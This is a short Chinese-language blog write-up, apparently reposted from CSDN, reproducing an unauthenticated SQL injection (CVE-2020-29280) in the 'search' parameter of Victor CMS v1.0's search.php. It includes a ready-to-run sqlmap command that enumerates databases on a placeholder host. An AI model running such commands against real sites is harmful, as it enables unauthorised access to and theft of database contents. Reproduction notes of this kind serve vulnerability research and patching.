Victor CMS 未授权sql注入(CVE-2020-29280)漏洞复现
作者:互联网
0X00简介
The Victor CMS v1.0版本存在安全漏洞,该漏洞源于通过search.php页面上的“search”参数造成的。
0X01影响范围
The Victor CMS v1.0
0X02漏洞复现
在search.php中search参数未经过滤就直接和sql语句拼接导致sql注入漏洞
1.访问首页点击搜索框,测试
直接上sqlmap,
python.exe .\sqlmap.py -u "http://mode.com/search.php" --data="search=1337*&submit=" --dbs --random-agent -v 3
payload
标签:search,--,2020,sql,php,CMS,Victor 来源: https://blog.csdn.net/xuandao_ahfengren/article/details/111402936